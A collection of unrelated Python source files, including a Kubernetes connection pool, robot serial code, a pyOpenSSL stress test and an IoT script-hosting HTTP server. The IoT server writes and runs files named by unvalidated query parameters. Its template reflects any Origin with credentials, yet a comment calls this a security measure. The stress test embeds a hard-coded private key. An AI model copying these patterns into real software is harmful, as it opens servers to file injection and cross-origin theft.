def _pod_is_up(item):
return item.status.pod_ip is not None and item.status.phase == 'Running'
def _process_item(self, item):
deployment_name = item.metadata.labels["app"]
is_deleted = item.metadata.deletion_timestamp is not None
if not is_deleted and self._pod_is_up(item):
if deployment_name in self._deployment_clusteraddresses:
self._add_pod_connection(deployment_name, item)
else:
cluster_ip, port = self._find_cluster_ip(deployment_name)
if cluster_ip:
self._deployment_clusteraddresses[
deployment_name
] = f'{cluster_ip}:{port}'
self._connections[f'{cluster_ip}:{port}'] = ConnectionList(port)
self._add_pod_connection(deployment_name, item)
else:
self._logger.debug(
f'Observed state change in unknown deployment {deployment_name}'
)
elif (
is_deleted
and self._pod_is_up(item)
and deployment_name in self._deployment_clusteraddresses
):
self._remove_pod_connection(deployment_name, item)
def _remove_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Removing connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
self._connections[
self._deployment_clusteraddresses[deployment_name]
].remove_connection(f'{target}:{connection_pool.port}')
def _add_pod_connection(self, deployment_name, item):
target = item.status.pod_ip
connection_pool = self._connections[
self._deployment_clusteraddresses[deployment_name]
]
if not connection_pool.has_connection(f'{target}:{connection_pool.port}'):
self._logger.debug(
f'Adding connection to {target}:{connection_pool.port} for deployment {deployment_name} at {self._deployment_clusteraddresses[deployment_name]}'
)
connection_pool.add_connection(
f'{target}:{connection_pool.port}',
self._create_connection(target=f'{target}:{connection_pool.port}'),
)
def _extract_app(self, service_item):
if service_item.metadata.annotations:
return ast.literal_eval(
list(service_item.metadata.annotations.values())[0]
)['spec']['selector']['app']
elif service_item.metadata.labels:
return service_item.metadata.labels['app']
return None
def _find_cluster_ip(self, deployment_name):
service_resp = self._k8s_client.list_namespaced_service(self._namespace)
for s in service_resp.items:
app = self._extract_app(s)
if app and deployment_name == app and s.spec.cluster_ip:
# find the port-in for this deployment
for p in s.spec.ports:
if p.name == 'port-in':
return s.spec.cluster_ip, p.port
return None, None
def is_remote_local_connection(first: str, second: str):
"""
Decides, whether ``first`` is remote host and ``second`` is localhost
:param first: the ip or host name of the first runtime
:param second: the ip or host name of the second runtime
:return: True, if first is remote and second is local
"""
try:
first_ip = ipaddress.ip_address(first)
first_global = first_ip.is_global
except ValueError:
if first == 'localhost':
first_global = False
else:
first_global = True
try:
second_ip = ipaddress.ip_address(second)
second_local = second_ip.is_private or second_ip.is_loopback
except ValueError:
if second == 'localhost':
second_local = True
else:
second_local = False
return first_global and second_local
def get_connect_host(
bind_host: str,
bind_expose_public: bool,
connect_args: Namespace,
) -> str:
"""
Compute the host address for ``connect_args``
:param bind_host: the ip for binding
:param bind_expose_public: True, if bind socket should be exposed publicly
:param connect_args: configuration for the host ip connection
:return: host ip
"""
runs_in_docker = connect_args.runs_in_docker
# by default __default_host__ is 0.0.0.0
# is BIND at local
bind_local = bind_host == __default_host__
# is CONNECT at local
conn_local = connect_args.host == __default_host__
# is CONNECT inside docker?
# check if `uses` has 'docker://' or,
# it is a remote pea managed by jinad. (all remote peas are inside docker)
conn_docker = (
(
getattr(connect_args, 'uses', None) is not None
and (
connect_args.uses.startswith('docker://')
or connect_args.uses.startswith('jinahub+docker://')
)
)
or not conn_local
or runs_in_docker
)
# is BIND & CONNECT all on the same remote?
bind_conn_same_remote = (
not bind_local and not conn_local and (bind_host == connect_args.host)
)
# pod1 in local, pod2 in local (conn_docker if pod2 in docker)
if bind_local and conn_local:
return __docker_host__ if conn_docker else __default_host__
# pod1 and pod2 are remote but they are in the same host (pod2 is local w.r.t pod1)
if bind_conn_same_remote:
return __docker_host__ if conn_docker else __default_host__
if bind_local and not conn_local:
# in this case we are telling CONN (at remote) our local ip address
if connect_args.host.startswith('localhost'):
# this is for the "psuedo" remote tests to pass
return __docker_host__
return get_public_ip() if bind_expose_public else get_internal_ip()
else:
# in this case we (at local) need to know about remote the BIND address
return bind_host
def create_connection_pool(args: 'Namespace') -> ConnectionPool:
"""
Creates the appropriate connection pool based on args
:param args: Arguments for this pod
:return: A connection pool object
"""
if args.k8s_namespace and args.k8s_connection_pool:
from jina.peapods.pods.k8slib.kubernetes_tools import K8sClients
k8s_clients = K8sClients()
return K8sGrpcConnectionPool(
namespace=args.k8s_namespace,
client=k8s_clients.core_v1,
)
else:
return GrpcConnectionPool()
|
base_use.py
|
import os
import time
from multiprocessing import Process
def me_process(process_name):
time.sleep(3)
print('current process name is : {} **** pid is {}'.format(process_name, os.getpid()))
class MeProcess(Process):
def __init__(self, name, *args, **kwargs):
super().__init__(*args, **kwargs)
self.process_name = name
def run(self):
time.sleep(3)
print('current process name is : {} **** pid is {}'.format(self.process_name, os.getpid()))
if __name__ == '__main__':
# p = Process(target=me_process, args=('me_process',))
# p.start()
# p.join()
mp = MeProcess('fuck process')
mp.start()
mp.join()
print('进程执行完毕')
|
Robot.py
|
__author__ = 'Edward J. C. Ashenbert'
import sys
import threading
import time
import serial
from NavigationSystem.UtilitiesMacroAndConstant import *
import datetime
import numpy as np
class Robot:
def __init__(self, port, baud_rate):
try:
print("Opening serial port: %s..." % port + ".")
self.robot_serial = serial.Serial(port, baud_rate, timeout=None)
time.sleep(1)
self.robot_serial.reset_input_buffer()
threading.Thread(target=self.flush_data_serial).start()
self.root_node = "Some thing"
self.prev_distance_front_left = 0
self.prev_distance_front_right = 0
self.prev_distance_rear_left = 0
self.prev_distance_rear_right = 0
except serial.serialutil.SerialException:
print("Serial not found at port " + port + ".")
sys.exit(0)
def flush_data_serial(self):
self.robot_serial.read(self.robot_serial.in_waiting)
time.sleep(0.3)
def write_command(self, cmd):
cmd = str(cmd)
print("\t" + str(datetime.datetime.now().time()) + " --- " + "[[ ", cmd, " ]]")
self.robot_serial.write(bytes(cmd, 'utf-8'))
def convert_string_to_int32(self, strData):
return (np.int32(strData[0]) << 24) + (np.int32(strData[1]) << 16) + (np.int32(strData[2]) << 8) + (
np.int32(strData[3]))
def read_command(self):
'''
request robot current position
'''
self.write_command("5;")
bytesRead = self.robot_serial.inWaiting()
return self.robot_serial.read(bytesRead)
def reset_dislocation_data(self):
'''
Everytime there's a spin behaviour we need to reset encoders for
:return:
'''
raw_data = str(self.read_command(), 'utf-8').split()
# self.write_command("5;")
# Check length of receive buffer with start and end frame
if (len(raw_data) == LENGTH_OF_DATA_RECEIVE and raw_data[0] == START_FRAME and raw_data[-1] == END_FRAME):
receive_data = raw_data[1:-1]
else:
return [0,0,0,0]
self.prev_distance_front_left = self.convert_string_to_int32(receive_data[1:5])
self.prev_distance_front_right = self.convert_string_to_int32(receive_data[6:10])
self.prev_distance_rear_left = self.convert_string_to_int32(receive_data[11:15])
self.prev_distance_rear_right = self.convert_string_to_int32(receive_data[16:])
self.prev_distance_front_left = 0
self.prev_distance_front_right = 0
self.prev_distance_rear_left = 0
self.prev_distance_rear_right = 0
def get_dislocation_data(self):
'''
Get dislocation of 4 wheel apparently
:return: [distance_front_left, distance_front_right, distance_rear_left, distance_rear_right]
'''
raw_data = str(self.read_command(), 'utf-8').split()
# self.write_command("5;")
# Check length of receive buffer with start and end frame
if (len(raw_data) == LENGTH_OF_DATA_RECEIVE and raw_data[0] == START_FRAME and raw_data[-1] == END_FRAME):
receive_data = raw_data[1:-1]
else:
return [0,0,0,0]
distance_front_left = self.convert_string_to_int32(receive_data[1:5])
distance_front_right = self.convert_string_to_int32(receive_data[6:10])
distance_rear_left = self.convert_string_to_int32(receive_data[11:15])
distance_rear_right = self.convert_string_to_int32(receive_data[16:])
# Mapping reverse pulse
distance_front_right = abs(distance_front_right)
distance_front_left = abs(distance_front_left)
distance_rear_left = abs(distance_rear_left)
distance_rear_right = abs(distance_rear_right)
if NAV_DEBUG:
print(self.root_node, "Pulse_receive_from_wheels", distance_front_left, distance_front_right,
distance_rear_left, distance_rear_right)
# Threshold the distance pulse return from wheels
if abs(distance_front_left - self.prev_distance_front_left) > DISTANCE_THRESH:
distance_front_left = self.prev_distance_front_left
if abs(distance_front_right - self.prev_distance_front_right) > DISTANCE_THRESH:
distance_front_right = self.prev_distance_front_right
if abs(distance_rear_left - self.prev_distance_rear_left) > DISTANCE_THRESH:
distance_rear_left = self.prev_distance_rear_left
if abs(distance_rear_right - self.prev_distance_rear_right) > DISTANCE_THRESH:
distance_rear_right = self.prev_distance_rear_right
dislocation_front_left = distance_front_left - self.prev_distance_front_left
dislocation_front_right = distance_front_right - self.prev_distance_front_right
dislocation_rear_left = distance_rear_left - self.prev_distance_rear_left
dislocation_rear_right = distance_rear_right - self.prev_distance_rear_right
self.prev_distance_front_left = distance_front_left
self.prev_distance_front_right = distance_front_right
self.prev_distance_rear_left = distance_rear_left
self.prev_distance_rear_right = distance_rear_right
if NAV_DEBUG:
print(self.root_node, "Dislocation_pulse", dislocation_front_left, dislocation_front_right, dislocation_rear_left, dislocation_rear_right)
return dislocation_front_left, dislocation_front_right, dislocation_rear_left, dislocation_rear_right
def get_dislocation(self):
'''
Get dislocation from robot center
:return: [center_x, center_y]
'''
result = self.get_dislocation_data()
mr_center_x = 0.0
mr_center_y = 0.0
if result:
dislocation_front_left = result[0]
dislocation_front_right = result[1]
dislocation_rear_left = result[2]
dislocation_rear_right = result[3]
front_left_angle, front_right_angle, rear_left_angle, rear_right_angle = self.vehicle.get_next_angle(False)
dislocation_front_left_x = dislocation_front_left * math.cos(front_left_angle)
dislocation_front_left_y = dislocation_front_left * math.sin(front_left_angle)
dislocation_front_right_x = dislocation_front_right * math.cos(front_right_angle)
dislocation_front_right_y = dislocation_front_right * math.sin(front_right_angle)
dislocation_rear_left_x = dislocation_rear_left * math.cos(rear_left_angle)
dislocation_rear_left_y = dislocation_rear_left * math.sin(rear_left_angle)
dislocation_rear_right_x = dislocation_rear_right * math.cos(rear_right_angle)
dislocation_rear_right_y = dislocation_rear_right * math.sin(rear_right_angle)
mr_center_x = (dislocation_front_left_x + dislocation_front_right_x + dislocation_rear_left_x + dislocation_rear_right_x) / 4 / ENCODER_TO_METER
mr_center_y = (dislocation_front_left_y + dislocation_front_right_y + dislocation_rear_left_y + dislocation_rear_right_y) / 4 / ENCODER_TO_METER
return mr_center_x, mr_center_y
DELIMITER = ','
ANGLE_COMMAND = 'q'
SPEED_COMMAND = 'n'
EOF = ';'
if __name__ == "__main__":
robot = Robot("COM1", 115200)
front_left_angle = 0
front_right_angle = 0
rear_left_angle = 0
rear_right_angle = 0
front_left_speed = 0
front_right_speed = 0
rear_left_speed = 0
rear_right_speed = 0
robot.write_command(
ANGLE_COMMAND + DELIMITER + str(front_left_angle) + DELIMITER + str(front_right_angle) + DELIMITER + str(
rear_left_angle) + DELIMITER + str(rear_right_angle) + EOF)
robot.write_command(
SPEED_COMMAND + DELIMITER + str(front_left_speed) + DELIMITER + str(front_right_speed) + DELIMITER + str(
rear_left_speed) + DELIMITER + str(rear_right_speed) + EOF)
print(robot.get_dislocation())
|
context-info-callback.py
|
# Copyright (C) Jean-Paul Calderone
# See LICENSE for details.
#
# Stress tester for thread-related bugs in global_info_callback in
# src/ssl/context.c. In 0.7 and earlier, this will somewhat reliably
# segfault or abort after a few dozen to a few thousand iterations on an SMP
# machine (generally not on a UP machine) due to uses of Python/C API
# without holding the GIL.
from itertools import count
from threading import Thread
from socket import socket
from OpenSSL.SSL import Context, TLSv1_METHOD, Connection, WantReadError
from OpenSSL.crypto import FILETYPE_PEM, load_certificate, load_privatekey
cleartextPrivateKeyPEM = (
"-----BEGIN RSA PRIVATE KEY-----\n"
"MIICXAIBAAKBgQDaemNe1syksAbFFpF3aoOrZ18vB/IQNZrAjFqXPv9iieJm7+Tc\n"
"g+lA/v0qmoEKrpT2xfwxXmvZwBNM4ZhyRC3DPIFEyJV7/3IA1p5iuMY/GJI1VIgn\n"
"aikQCnrsyxtaRpsMBeZRniaVzcUJ+XnEdFGEjlo+k0xlwfVclDEMwgpXAQIDAQAB\n"
"AoGBALi0a7pMQqqgnriVAdpBVJveQtxSDVWi2/gZMKVZfzNheuSnv4amhtaKPKJ+\n"
"CMZtHkcazsE2IFvxRN/kgato9H3gJqq8nq2CkdpdLNVKBoxiCtkLfutdY4SQLtoY\n"
"USN7exk131pchsAJXYlR6mCW+ZP+E523cNwpPgsyKxVbmXSBAkEA9470fy2W0jFM\n"
"taZFslpntKSzbvn6JmdtjtvWrM1bBaeeqFiGBuQFYg46VaCUaeRWYw02jmYAsDYh\n"
"ZQavmXThaQJBAOHtlAQ0IJJEiMZr6vtVPH32fmbthSv1AUSYPzKqdlQrUnOXPQXu\n"
"z70cFoLG1TvPF5rBxbOkbQ/s8/ka5ZjPfdkCQCeC7YsO36+UpsWnUCBzRXITh4AC\n"
"7eYLQ/U1KUJTVF/GrQ/5cQrQgftwgecAxi9Qfmk4xqhbp2h4e0QAmS5I9WECQH02\n"
"0QwrX8nxFeTytr8pFGezj4a4KVCdb2B3CL+p3f70K7RIo9d/7b6frJI6ZL/LHQf2\n"
"UP4pKRDkgKsVDx7MELECQGm072/Z7vmb03h/uE95IYJOgY4nfmYs0QKA9Is18wUz\n"
"DpjfE33p0Ha6GO1VZRIQoqE24F8o5oimy3BEjryFuw4=\n"
"-----END RSA PRIVATE KEY-----\n"
)
cleartextCertificatePEM = (
"-----BEGIN CERTIFICATE-----\n"
"MIICfTCCAeYCAQEwDQYJKoZIhvcNAQEEBQAwgYYxCzAJBgNVBAYTAlVTMRkwFwYD\n"
"VQQDExBweW9wZW5zc2wuc2YubmV0MREwDwYDVQQHEwhOZXcgWW9yazESMBAGA1UE\n"
"ChMJUHlPcGVuU1NMMREwDwYDVQQIEwhOZXcgWW9yazEQMA4GCSqGSIb3DQEJARYB\n"
"IDEQMA4GA1UECxMHVGVzdGluZzAeFw0wODAzMjUxOTA0MTNaFw0wOTAzMjUxOTA0\n"
"MTNaMIGGMQswCQYDVQQGEwJVUzEZMBcGA1UEAxMQcHlvcGVuc3NsLnNmLm5ldDER\n"
"MA8GA1UEBxMITmV3IFlvcmsxEjAQBgNVBAoTCVB5T3BlblNTTDERMA8GA1UECBMI\n"
"TmV3IFlvcmsxEDAOBgkqhkiG9w0BCQEWASAxEDAOBgNVBAsTB1Rlc3RpbmcwgZ8w\n"
"DQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBANp6Y17WzKSwBsUWkXdqg6tnXy8H8hA1\n"
"msCMWpc+/2KJ4mbv5NyD6UD+/SqagQqulPbF/DFea9nAE0zhmHJELcM8gUTIlXv/\n"
"cgDWnmK4xj8YkjVUiCdqKRAKeuzLG1pGmwwF5lGeJpXNxQn5ecR0UYSOWj6TTGXB\n"
"9VyUMQzCClcBAgMBAAEwDQYJKoZIhvcNAQEEBQADgYEAmm0Vzvv1O91WLl2LnF2P\n"
"q55LJdOnJbCCXIgxLdoVmvYAz1ZJq1eGKgKWI5QLgxiSzJLEU7KK//aVfiZzoCd5\n"
"RipBiEEMEV4eAY317bHPwPP+4Bj9t0l8AsDLseC5vLRHgxrLEu3bn08DYx6imB5Q\n"
"UBj849/xpszEM7BhwKE0GiQ=\n"
"-----END CERTIFICATE-----\n"
)
count = count()
def go():
port = socket()
port.bind(("", 0))
port.listen(1)
called = []
def info(conn, where, ret):
print count.next()
called.append(None)
context = Context(TLSv1_METHOD)
context.set_info_callback(info)
context.use_certificate(
load_certificate(FILETYPE_PEM, cleartextCertificatePEM)
)
context.use_privatekey(
load_privatekey(FILETYPE_PEM, cleartextPrivateKeyPEM)
)
while 1:
client = socket()
client.setblocking(False)
client.connect_ex(port.getsockname())
clientSSL = Connection(Context(TLSv1_METHOD), client)
clientSSL.set_connect_state()
server, ignored = port.accept()
server.setblocking(False)
serverSSL = Connection(context, server)
serverSSL.set_accept_state()
del called[:]
while not called:
for ssl in clientSSL, serverSSL:
try:
ssl.do_handshake()
except WantReadError:
pass
threads = [Thread(target=go, args=()) for i in xrange(2)]
for th in threads:
th.start()
for th in threads:
th.join()
|
index.py
|
#!/usr/bin/pypy3
#!/usr/bin/python3
from http.client import HTTPSConnection
from base64 import b64encode
import json
import mysql.connector
from datetime import datetime, timedelta
from threading import Thread
import cgi
class ukcompanieshouse:
URL = 'api.companieshouse.gov.uk'
KEY = ''
def __init__(self):
basic_auth = b64encode((self.KEY+':').encode(encoding='ascii', errors='ignore')).decode("ascii")
self.headers = {'Authorization' : 'Basic {}'.format(basic_auth)}
def api(self, req):
c = HTTPSConnection(self.URL)
c.request('GET', req, headers=self.headers)
return c.getresponse().read().decode('utf-8', errors='ignore')
def search(self, keyword):
res = self.api('/search/companies?q={}&items_per_page=10'.format(keyword.replace(' ', '%20')))
results = [[company['title'],company['company_number']] for company in json.loads(res)['items']]
return results
def filing_history(self, company_number):
res = self.api('/company/{}/filing-history'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def officers(self, company_number):
res = self.api('/company/{}/officers'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def persons_with_significant_control(self, company_number):
res = self.api('/company/{}/persons-with-significant-control'.format(company_number))
results = json.loads(res)
if 'items' in results:
return results['items']
else:
return {}
def exemptions(self, company_number):
res = self.api('/company/{}/exemptions'.format(company_number))
results = json.loads(res)
if 'exemptions' in results:
return results['exemptions']
else:
return {}
def registers(self, company_number):
res = self.api('/company/{}/registers'.format(company_number))
results = json.loads(res)
if 'error' in results:
return {}
else:
return results
def company_profile(self, company_number, recursive=True):
res = self.api('/company/{}'.format(company_number))
results = json.loads(res)
for r in results:
if results[r] == False:
results[r] = 'No'
elif results[r] == True:
results[r] = 'Yes'
if recursive:
results['links']['filing_history'] = self.filing_history(company_number)
results['links']['officers'] = self.officers(company_number)
results['links']['persons_with_significant_control'] = self.persons_with_significant_control(company_number)
results['links']['exemptions'] = self.exemptions(company_number)
results['links']['registers'] = self.registers(company_number)
results['date_retrieved'] = str(datetime.now().date())
results['url'] = 'https://beta.companieshouse.gov.uk'+results['links']['self']
return {'results': results}
def commit(company_number, results, cursor, cnx):
sql1 = "DELETE FROM ukcompanieshouse WHERE company_number=%s;"
sql2 = "INSERT INTO ukcompanieshouse VALUES(%s, %s, %s);"
val = (
company_number,
results,
str(datetime.now()))
cursor.execute(sql1, (company_number,))
cnx.commit()
cursor.execute(sql2, val)
cnx.commit()
cursor.close()
cnx.close()
def expected(dump):
return True
def main():
form = cgi.FieldStorage()
company_number = str(form['company_number'].value)
cnx = mysql.connector.connect(user='api', database='projectapi')
cursor = cnx.cursor(buffered=True)
sql = "SELECT * FROM ukcompanieshouse WHERE company_number=%s;"
cursor.execute(sql, (company_number,))
cache_results = ''
cache_expired = False
fetch_results = ''
results = ''
try:
data = list(cursor.fetchall()[0])
if (datetime.now()-timedelta(days=30)) > data[2]:
raise IndexError('item in database expired')
cache_results = data[1]
cursor.close()
cnx.close()
except:
cache_expired = True
company = ukcompanieshouse()
fetch_results = json.dumps(company.company_profile(company_number))
finally:
if not cache_expired:
results = cache_results
elif expected(fetch_results):
t1 = Thread(target=commit, args=(company_number, fetch_results, cursor, cnx,))
t1.start()
results = fetch_results
elif cache_expired:
results = cache_results
else:
results = json.dumps({'error':'api access problem'})
return results
if __name__ == '__main__':
print('Content-type:application/json', end='\r\n\r\n')
print(main().encode(encoding='UTF-8',errors='ignore').decode(), end='')
|
app.py
|
"""
import tkinter as tk
from tkinter.ttk import *
import tkinter.font as font
import tkinter.scrolledtext as tkst
"""
import subprocess
from http.server import HTTPServer, BaseHTTPRequestHandler
import socketserver
import socket
from io import BytesIO
import threading
import requests
import os
import signal
import codecs
import subprocess
import json
import urllib.parse
from urllib.parse import parse_qsl, parse_qs
from datetime import datetime
# run command:
# python -m app.py --cgi 8001
"""
class Application(tk.Frame):
logcat = "Logcat test"
def __init__(self, master=None):
super().__init__(master)
self.master = master
self.pack(fill="both", expand=1)
self.start = tk.Button(self)
self.stop = tk.Button(self)
self.updateBtn = tk.Button(self)
self.logInput = tk.Entry(self)
self.logSend = tk.Button(self)
self.logCanvas = tk.Canvas(self)
self.logCanvas = tk.Canvas(self)
self.create_widgets()
def create_widgets(self):
self.start["text"] = "Server Start"
self.start["fg"] = "green"
self.start["command"] = self.startServer
self.start["width"] = 20
self.start["height"] = 2
self.start["font"] = font.Font(size=10)
self.start.place(x=2, y=4)
self.stop["text"] = "Server Stop"
self.stop['fg'] = "red"
self.stop['command'] = self.stopServer
self.stop["width"] = 20
self.stop["height"] = 2
self.stop["font"] = font.Font(size=10)
self.stop.place(x=2, y=50)
self.updateBtn["text"] = "Server Update"
self.updateBtn['fg'] = "black"
self.updateBtn['command'] = self.updateServer
self.updateBtn["width"] = 20
self.updateBtn["height"] = 2
self.updateBtn["font"] = font.Font(size=10)
self.updateBtn.place(x=2, y=95)
self.logInput["width"] = 45
self.logInput.place(x=175, y=420)
self.logSend["text"] = "Send"
self.logSend["command"] = self.sendLog
self.logSend["width"] = 5
self.logSend["font"] = font.Font(size=7)
self.logSend.place(x=450, y=420)
self.frame1 = tk.Frame(
master=self,
bg='black',
width=0,
height=0
)
self.frame1.place(x=175, y=5)
self.editArea = tkst.ScrolledText(
master=self.frame1,
wrap=tk.WORD,
bg='black',
fg='white',
width=37,
height=25
)
self.editArea.pack(fill=tk.BOTH, expand=True)
self.editArea.insert(tk.INSERT, "Programm Start.")
# Adding some text, to see if scroll is working as we expect it
self.quit = tk.Button(self, text="QUIT", fg="red", width=20, height=2,
command=self.master.destroy)
self.quit.pack(side="bottom", pady=10)
# button clicks
def say_hi(self):
print("hi there, everyone!")
def startServer(self):
self.editArea.insert(
tk.INSERT, "\nStarting HTTP server: localhost:8000")
print("Starting HTTP server: localhost:8000")
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
self.httpd = socketserver.TCPServer(
("10.202.240.252", 8000), SimpleHTTPRequestHandler)
self.serverThread = threading.Thread(target=self.serveInThread)
self.serverThread.daemon = True
self.serverThread.start()
pr = Process()
pr.startAllProcesses()
def stopServer(self):
self.editArea.insert(tk.INSERT, "\nStoping Server...")
# self.editArea.insert(tk.INSERT, "\nStoping Server.")
print("Stopping server")
self.serverThread = None
def updateServer(self):
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
def printCon(self, data):
self.editArea.insert(tk.INSERT, str(data))
print(str(data))
def serveInThread(self):
while True:
self.httpd.handle_request()
def sendLog(self):
# print("Sending Command: " + str(self.logInput.get()))
# self.editArea.insert(tk.INSERT, "\n>" +
# str(self.logInput.get()) + "\n")
self.logInput.delete(0, 'end')
"""
class Process:
runningProcesses = []
def restartProcess(self, process):
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, items in enumerate(self.runningProcesses):
if(items['name'] == process):
print('>Killing Process: ' + str(items['processID']))
try:
os.kill(items['processID'], signal.SIGBREAK)
pass
except Exception:
pass
filePortSet = open(
savesAsJson['cloudscripts'][i]['info']['filename'], "r")
scriptPatched = filePortSet.read().replace(
"DEF_PORT", str(items['port']))
filePortSet.close()
fileSet = codecs.open(
savesAsJson['cloudscripts'][i]['info']['filename'], "w", "utf-8")
fileSet.write(scriptPatched)
fileSet.close()
processCMD = ""
if (savesAsJson['cloudscripts'][i]['info']['language'] == 'javascript'):
processCMD = 'node '
elif (savesAsJson['cloudscripts'][i]['info']['language'] == 'python'):
processCMD = 'python '
process1 = subprocess.Popen([processCMD, savesAsJson['cloudscripts'][i]['info']['filename']],
stdout=subprocess.PIPE,
stderr=None,
universal_newlines=True)
self.runningProcesses[i]["processID"] = process1.pid
print("Running subprocesses: " + str(self.runningProcesses))
def startAllProcesses(self):
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, itemThings in enumerate(savesAsJson["cloudscripts"]):
# print(itemThings['info']['filename'])
filePortSet = open(itemThings['info']['filename'], "r")
scriptPatched = filePortSet.read().replace("DEF_PORT", str(8001+i))
filePortSet.close()
fileSet = codecs.open(itemThings['info']['filename'], "w", "utf-8")
fileSet.write(scriptPatched)
fileSet.close()
if(itemThings['info']['language'] == 'javascript'):
process1 = subprocess.Popen(['node', itemThings['info']['filename']],
stdout=None,
stderr=None,
universal_newlines=False)
elif (itemThings['info']['language'] == 'python'):
process1 = subprocess.Popen(['python', itemThings['info']['filename']],
stdout=None,
stderr=None,
universal_newlines=False)
self.runningProcesses.append(
{'ID': i, 'processID': process1.pid, 'name': itemThings['info']['name'], 'port': 8001+i})
process_running = True
print("Running subprocesses: " + str(self.runningProcesses))
def startProcess(self, process):
print("Starting new Process!")
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
for i, items in enumerate(savesAsJson["cloudscripts"]):
if(items['info']['name'] == process):
filePortSet = open(
savesAsJson['cloudscripts'][i]['info']['filename'], "r")
scriptPatched = filePortSet.read().replace(
"DEF_PORT", str(8001+i))
filePortSet.close()
fileSet = codecs.open(
savesAsJson['cloudscripts'][i]['info']['filename'], "w", "utf-8")
fileSet.write(scriptPatched)
fileSet.close()
processCMD = ""
if (savesAsJson['cloudscripts'][i]['info']['language'] == 'javascript'):
processCMD = 'node '
elif (savesAsJson['cloudscripts'][i]['info']['language'] == 'python'):
processCMD = 'python '
process1 = subprocess.Popen([processCMD, savesAsJson['cloudscripts'][i]['info']['filename']],
stdout=subprocess.PIPE,
stderr=None,
universal_newlines=True)
self.runningProcesses.append(
{'ID': i, 'processID': process1.pid, 'name': items['info']['name'], 'port': 8001+i})
print("Running subprocesses: " + str(self.runningProcesses))
class StorageHandler():
savesAsJson = None
def __init__(self):
super().__init__()
jsonFile = open("thingsaves.json", "r")
self.savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
def getFilenameByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return itemThings['info']['filename']
def getLanguageByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return itemThings['info']['language']
def getCloudscriptByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return itemThings
def getIndexByName(self, name):
for i, itemThings in enumerate(self.savesAsJson["cloudscripts"]):
# print(itemThings)
if (itemThings['info']['name'] == name):
return i
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
pr = Process()
fs = StorageHandler()
def do_GET(self):
jsonFile = open("thingsaves.json", "r")
savesAsJson = json.loads(jsonFile.read())
jsonFile.close()
print("Request from \"" +
str(self.headers["Referer"]) + "\" with path " + str(self.path))
path1 = str(self.path)
print(str(self.path))
if (path1.startswith("/create")):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# http://192.168.0.159:8000/create?name="thing1"&lang="javascript"
query = parse_qs(path1[8:])
name = str(query['name']).replace("['\"", "").replace("\"']", "")
title = str(query['title']).replace("['\"", "").replace("\"']", "")
lang = str(query['lang']).replace("['\"", "").replace("\"']", "")
desc = str(query['desc']).replace("['\"", "").replace("\"']", "")
user = str(query['user']).replace("['\"", "").replace("\"']", "")
response = BytesIO()
response.write(b"creating new thing ")
self.wfile.write(response.getvalue())
thingSaves = codecs.open("thingsaves.json", "r", "utf-8")
jsonThingSaves = thingSaves.read()
thingSaves.close()
arraySize = 1
try:
arraySize = len(json.loads(jsonThingSaves)["cloudscripts"]) + 1
except Exception:
pass
newThingJson = {
"thingID": arraySize,
"info": {
"title": title,
"name": name,
"description": desc,
"language": lang,
"user": user,
"filename": name + (".js" if lang == "javascript" else ".py")
}
}
if (len(jsonThingSaves) > 0):
jsonParsed = json.dumps(newThingJson)
print("JSON parsed: ", jsonParsed)
data = json.loads(jsonThingSaves)["cloudscripts"]
data1 = ""
if (len(data) == 1):
data1 = json.loads(json.dumps(str(data[:len(data)]).replace(
"[", "").replace("]", ""))) + ","
else:
data1 = ""
jsonSaves = "{\"cloudscripts\":[" + \
data1 + json.dumps(newThingJson) + "]}"
codecs.open("thingsaves.json", "w").close()
f = codecs.open("thingsaves.json", "w")
f.write(jsonSaves.replace("\'", "\""))
f.close()
else:
open("thingsaves.json", "w").close()
jsonSave = {"cloudscripts": [newThingJson]}
f = open("thingsaves.json", "w",)
f.write(json.dumps(jsonSave))
f.close()
jsonFile = open("thingsaves.json", "r")
req = requests.post(
"http://iotdev.htlwy.ac.at/thing/iotusecases2020/setCloudscript", data=jsonFile.read())
if (lang == "javascript"):
newThing = open(name + ".js", "w")
newThing.write(
"var express=require(\'express\')\nvar app=express()\n\napp.get(\'/" + name + "\', (req, res)=> {\n res.send(\'Hello World!\')\n console.log(\"Hello\")\n})\n\n//leave this untouched! \napp.listen(DEF_PORT)")
newThing.close()
self.pr.startProcess(name)
elif (lang == "python"):
newThing = open(name + ".py", "w")
newThing.write("from http.server import BaseHTTPRequestHandler, HTTPServer\n"
"from io import BytesIO\n\n"
"PORT = DEF_PORT\n\n"
"class ServerHandler(BaseHTTPRequestHandler):\n"
" def do_GET(self):\n"
" self.send_response(200)\n"
" # Headers for security measures\n"
" self.send_header(\"Content-type\", \"text/plain\")\n"
" self.send_header('Access-Control-Allow-Credentials', 'true')\n"
" self.send_header('Access-Control-Allow-Origin',str(self.headers[\"Origin\"]))\n"
" self.end_headers()\n"
" path = str(self.path)\n"
" if(path.startswith(\"/" +
name + "\")):\n"
" res = BytesIO()\n"
" res.write(b'Hello world from Thing 1!')\n"
" self.wfile.write(res.getvalue())\n\n"
